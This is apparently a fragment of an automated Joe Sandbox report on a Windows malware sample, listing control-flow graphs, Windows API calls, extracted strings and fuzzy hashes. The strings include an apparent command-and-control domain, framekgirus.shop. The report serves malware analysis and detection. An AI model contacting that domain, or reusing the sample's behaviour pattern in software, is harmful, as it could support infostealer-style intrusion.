86->67 87->86 89 ae8e76-ae8e79 87->89 89->86
                                                                                                                  APIs
                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00AE8B9D
                                                                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00AE8EFA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ab0000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BlanketInformationProxyVolume
                                                                                                                  • String ID: ,./,$S$]E$]E$b>c<$k2`0$x;
                                                                                                                  • API String ID: 3048927609-4038474941
                                                                                                                  • Opcode ID: 064d01a10d34db0762b0fc01829a44f1d6a37bf85a4d8a17215ad2fe1b640d10
                                                                                                                  • Instruction ID: aca3340354064373e63bad1152c511efab2db1f64fbee58420b1c31c153813cb
                                                                                                                  • Opcode Fuzzy Hash: 064d01a10d34db0762b0fc01829a44f1d6a37bf85a4d8a17215ad2fe1b640d10
                                                                                                                  • Instruction Fuzzy Hash: A22210766083419BD310CF69C885B6BBBE5FFC5304F14892DF5999B2A0DB79D805CB82

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 217 abde48-abde78 call ab95a0 CoUninitialize 220 abde80-abded4 217->220 220->220 221 abded6-abdeef 220->221 222 abdef0-abdf25 221->222 222->222 223 abdf27-abdf87 222->223 224 abdf90-abdfe9 223->224 224->224 225 abdfeb-abdffc 224->225 226 abe01b-abe027 225->226 227 abdffe-abe00f 225->227 229 abe03b-abe045 226->229 230 abe029-abe02a 226->230 228 abe010-abe019 227->228 228->226 228->228 232 abe05b-abe067 229->232 233 abe047-abe04b 229->233 231 abe030-abe039 230->231 231->229 231->231 235 abe07b-abe085 232->235 236 abe069-abe06a 232->236 234 abe050-abe059 233->234 234->232 234->234 238 abe09b-abe0a7 235->238 239 abe087-abe08b 235->239 237 abe070-abe079 236->237 237->235 237->237 241 abe0a9-abe0ab 238->241 242 abe0c1-abe1df 238->242 240 abe090-abe099 239->240 240->238 240->240 243 abe0b0-abe0bd 241->243 244 abe1e0-abe22a 242->244 243->243 245 abe0bf 243->245 244->244 246 abe22c-abe248 244->246 245->242 247 abe250-abe27c 246->247 247->247 248 abe27e-abe2a5 call abb4f0 247->248 250 abe2aa-abe2c4 248->250
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ab0000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Uninitialize
                                                                                                                  • String ID: .a]b$GK8m$LM$T_RE$framekgirus.shop$iped$wtf|
                                                                                                                  • API String ID: 3861434553-152157548
                                                                                                                  • Opcode ID: e56f50f46c1c88dae8460cd48a33080a553b71aae014a94340f1b6e80efae3a5
                                                                                                                  • Instruction ID: efe3a476706d4699e9828a0d92ce15579b6d4479a32893c618bfa13349acffea
                                                                                                                  • Opcode Fuzzy Hash: e56f50f46c1c88dae8460cd48a33080a553b71aae014a94340f1b6e80efae3a5
                                                                                                                  • Instruction Fuzzy Hash: 13B123756493C18BD335CF69C8903EFBBE1ABE7310F18896DD4D94B242C77989068B92

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 295 ad3120-ad3187 296 ad3190-ad31be 295->296 296->296 297 ad31c0-ad3208 RtlExpandEnvironmentStrings 296->297 298 ad3210-ad325f 297->298 298->298 299 ad3261-ad326e 298->299 300 ad32dc-ad32e7 299->300 301 ad32bc-ad32c2 call ab7ee0 299->301 302 ad342f-ad3441 299->302 303 ad3448-ad3450 299->303 304 ad3275-ad327a 299->304 305 ad32c5-ad32ca 299->305 306 ad32b4 299->306 307 ad35c6 299->307 308 ad35b6-ad35be 299->308 309 ad35e1-ad366e 299->309 310 ad32d2-ad32db 299->310 312 ad32e9-ad32ee 300->312 313 ad32f0 300->313 301->305 302->301 302->303 302->305 302->307 302->308 302->309 302->310 311 ad32d0 302->311 314 ad35cc-ad35d2 call ab7ee0 302->314 315 ad36a4-ad36bb 302->315 316 ad35db 302->316 317 ad37ba-ad37c2 call ab7ee0 302->317 318 ad37b4 302->318 319 ad3459 303->319 320 ad3452-ad3457 303->320 321 ad327c-ad3281 304->321 322 ad3283 304->322 305->311 306->301 308->307 324 ad3670-ad3684 309->324 331 ad32f7-ad332b call ab7ed0 312->331 313->331 314->316 326 ad36c0-ad36fc 315->326 327 ad3460-ad34f4 call ab7ed0 319->327 320->327 328 ad3286-ad32ad call ab7ed0 RtlExpandEnvironmentStrings 321->328 322->328 324->324 325 ad3686-ad3694 call ad1060 324->325 340 ad3699-ad369c 325->340 326->326 334 ad36fe-ad3771 326->334 347 ad3500-ad3536 327->347 328->300 328->301 328->302 328->303 328->305 328->306 328->307 328->308 328->309 346 ad3330-ad33ad 331->346 341 ad3780-ad3790 334->341 340->315 341->341 345 ad3792-ad37ab call ad0c30 341->345 345->318 346->346 350 ad33af-ad33bd 346->350 347->347 349 ad3538-ad3543 347->349 354 ad3545-ad354f 349->354 355 ad3561-ad356f 349->355 352 ad33bf-ad33c4 350->352 353 ad33e1-ad33f0 350->353 359 ad33d0-ad33df 352->359 360 ad3411-ad341b call af0ba0 353->360 361 ad33f2-ad33f5 353->361 356 ad3550-ad355f 354->356 357 ad3591-ad35af call af0ba0 355->357 358 ad3571-ad3574 355->358 356->355 356->356 357->301 357->305 357->307 357->308 357->310 357->311 357->314 357->315 357->316 357->317 357->318 362 ad3580-ad358f 358->362 359->353 359->359 365 ad3420-ad3428 360->365 364 ad3400-ad340f 361->364 362->357 362->362 364->360 364->364 365->301 365->302 365->303 365->305 365->307 365->308 365->309 365->310 365->311 365->314 365->315 365->316 365->317 365->318
                                                                                                                  APIs
                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00AD31F3
                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00AD32A2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ab0000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                  • String ID: 7x~
                                                                                                                  • API String ID: 237503144-3352779061
                                                                                                                  • Opcode ID: 3cb6788a32bd792b4ad6a795f51bdcbc24b11b473dda2a7e696db38dd6ea3016
                                                                                                                  • Instruction ID: 26d0d88110ecd88623ecd18923dd63312d495e0d30a3a630fc72a1230c6f8d17
                                                                                                                  • Opcode Fuzzy Hash: 3cb6788a32bd792b4ad6a795f51bdcbc24b11b473dda2a7e696db38dd6ea3016
                                                                                                                  • Instruction Fuzzy Hash: 3F0254B2E10215CFDB24CFA8D8816AEBBB2FF84310F194269E506AF355E7748901CB91
                                                                                                                  APIs
                                                                                                                  • LdrInitializeThunk.NTDLL(00ABD0E7,00000002,00000004,?), ref: 00AED93E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ab0000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 613 3227ae7-3227b78 RtlExitUserProcess 615 3227b84-3227be5 613->615
                                                                                                                  APIs
                                                                                                                  • RtlExitUserProcess.NTDLL(?,77E8F3B0,000000FF), ref: 03227AF9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2035850350.0000000003220000.00000040.00001000.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_3220000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExitProcessUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3902816426-0
                                                                                                                  • Opcode ID: f81fb457251e8abd28dec9aa86313bda8b5355460c0dcf9a488223a7eab7cfa4
                                                                                                                  • Instruction ID: 4340ffffa487b77c5afdbd2afd127791bc90d6f7acb36af2a514e202b0a8d118
                                                                                                                  • Opcode Fuzzy Hash: f81fb457251e8abd28dec9aa86313bda8b5355460c0dcf9a488223a7eab7cfa4
                                                                                                                  • Instruction Fuzzy Hash: 6331E9B6D1060CEFDB11DF95C944BDEBBB8FB14336F21861AE421B6190D7785A058F60

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 619 3227aec-3227b78 RtlExitUserProcess 620 3227b84-3227be5 619->620
                                                                                                                  APIs
                                                                                                                  • RtlExitUserProcess.NTDLL(?,77E8F3B0,000000FF), ref: 03227AF9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2035850350.0000000003220000.00000040.00001000.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_3220000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExitProcessUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3902816426-0
                                                                                                                  • Opcode ID: 7f772fafb3d5b2235239c1ade12122fe701ac459db86f7831e9bd7a1641e40e3
                                                                                                                  • Instruction ID: 593646ac28abb7c98e06ca26a80b6245e71aff29887739358f113eabdf437f8f
                                                                                                                  • Opcode Fuzzy Hash: 7f772fafb3d5b2235239c1ade12122fe701ac459db86f7831e9bd7a1641e40e3
                                                                                                                  • Instruction Fuzzy Hash: AB31E9B6D1060CEFDB11DF95C944BDEBBB8FB14336F21461AE421A6190D7785A058F60
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ab0000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8320ff10df7ebe3dbe5306b6b8bf6df6f3944253500ec86289996afa9ab82fb2
                                                                                                                  • Instruction ID: 8def709ad5b722982ff0c4e06ea9692959f6df3c3c907b99b9fd0874b0ab3b76
                                                                                                                  • Opcode Fuzzy Hash: 8320ff10df7ebe3dbe5306b6b8bf6df6f3944253500ec86289996afa9ab82fb2
                                                                                                                  • Instruction Fuzzy Hash: DDF09071128346EFD7206FA6AD59B273678EFCA751F140C35F40192161EB31A80AC671
                                                                                                                  APIs
                                                                                                                  • WSAStartup.WS2_32(00000202), ref: 00AB9CC6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ab0000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Startup
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 724789610-0
                                                                                                                  • Opcode ID: 4fc288dadc46284ee7f9bc5e3750b2b7f68ece8ad9fe3fc6d0e6ff8925270440
                                                                                                                  • Instruction ID: 0fa653af75857e974279738b83e6da8843d71110d37fffc964eae03e23b0a642
                                                                                                                  • Opcode Fuzzy Hash: 4fc288dadc46284ee7f9bc5e3750b2b7f68ece8ad9fe3fc6d0e6ff8925270440
                                                                                                                  • Instruction Fuzzy Hash: BCC080506D06509AF11CC3F58C1ED37755F97C7F45700410FD211093E7C5A00006C690
                                                                                                                  APIs
                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00ABC6B0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ab0000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeSecurity
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 640775948-0
                                                                                                                  • Opcode ID: cc78126fa63c0b429a9120750e504441be273b354cc5beac203d793f0fbbb0f0
                                                                                                                  • Instruction ID: bcd323fd5bdf2ec539dbe91aef9b0339c0431f6132d437d5141f4650defa5a1d
                                                                                                                  • Opcode Fuzzy Hash: cc78126fa63c0b429a9120750e504441be273b354cc5beac203d793f0fbbb0f0
                                                                                                                  • Instruction Fuzzy Hash: 92E05E35BD43006BFB388A98EC13F5426125384B61F388214B310EE3D8D8B8A503820C
                                                                                                                  APIs
                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 00ABC673
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ab0000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Initialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2538663250-0
                                                                                                                  • Opcode ID: 580371dd530f4793b72c79023b10ba0d017ff63a43c2c815dd7c50dead1688e1
                                                                                                                  • Instruction ID: 229617b1f1cecc8ba725801a3b151c9f8970670f1cca1e6d549e520d72fa6f3a
                                                                                                                  • Opcode Fuzzy Hash: 580371dd530f4793b72c79023b10ba0d017ff63a43c2c815dd7c50dead1688e1
                                                                                                                  • Instruction Fuzzy Hash: 2DE0CD32E506041BD704A7ACDC47F55351A8781315F4C82146650CA2C5E9346911C155
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?,AC36FDA1,00AB8797,2D2C008A), ref: 00AEBCA0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ab0000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 99e45b7fb86a8e80bd8a4f1c7b448bdb2831f0d8362b0e8f021080383ac2c9d2
                                                                                                                  • Instruction ID: 070731fd5683597567a12dcfeec27a35ffafeda7705d8e6528a582939fc807a3
                                                                                                                  • Opcode Fuzzy Hash: 99e45b7fb86a8e80bd8a4f1c7b448bdb2831f0d8362b0e8f021080383ac2c9d2
                                                                                                                  • Instruction Fuzzy Hash: 62C09231045120AFCA242B15FC09FCB7F69EF95360F1245A2B005670B2CB71AC82DAD4
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00C745C3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2034770588.0000000000C68000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ab0000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: 6c8b9c373bdfddb5b5804d8e7f7da98055f138dff3cb23ff9dde8812443170b1
                                                                                                                  • Instruction ID: b08467dbcfca5527f25b25ff1a5bdfb96ca4d5982fa9d2f735f1a4e8c6ef434a
                                                                                                                  • Opcode Fuzzy Hash: 6c8b9c373bdfddb5b5804d8e7f7da98055f138dff3cb23ff9dde8812443170b1
                                                                                                                  • Instruction Fuzzy Hash: 3AE0E2B6300208ABDB94CE8CD984BAA37DDA788310F10C011FA1DD7340C334ED509B66
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ab0000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ($?$f$u$}
                                                                                                                  • API String ID: 0-3561895482
                                                                                                                  • Opcode ID: e8023becbad4c1ab0961b228ffc84725abbd87b2e0eabe1d46396c00b19488a0
                                                                                                                  • Instruction ID: 84fec55cf992e36f94580151ef128c802a1d63ad929d2456193537f0c526b669
                                                                                                                  • Opcode Fuzzy Hash: e8023becbad4c1ab0961b228ffc84725abbd87b2e0eabe1d46396c00b19488a0
                                                                                                                  • Instruction Fuzzy Hash: 7612A271A0C3808BC364DF38C5917AEBBE5AFD6310F598E2EE4D997392D67488418B43
                                                                                                                  APIs
                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00AD38A8
                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,6A195A3A), ref: 00AD394C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ab0000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                  • String ID: 52$QVTH$]VWC$lnmh$n`fn
                                                                                                                  • API String ID: 237503144-3964871452
                                                                                                                  • Opcode ID: 25b063261f999ed0bb04f0f26ad9b92e15563181c3cfb8a5416ff35396942679
                                                                                                                  • Instruction ID: 9669fc911413b972b7d6c4b95404f7d8d72de5effbe3dc54a559526e98836972
                                                                                                                  • Opcode Fuzzy Hash: 25b063261f999ed0bb04f0f26ad9b92e15563181c3cfb8a5416ff35396942679
                                                                                                                  • Instruction Fuzzy Hash: 8CE13671A0C3418FD724CF68C8917AFBBE1EB84354F044A2EF9968B381D7759909DB82
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000007.00000002.2034752671.0000000000AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000AF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000007.00000002.2034770588.0000000000C68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
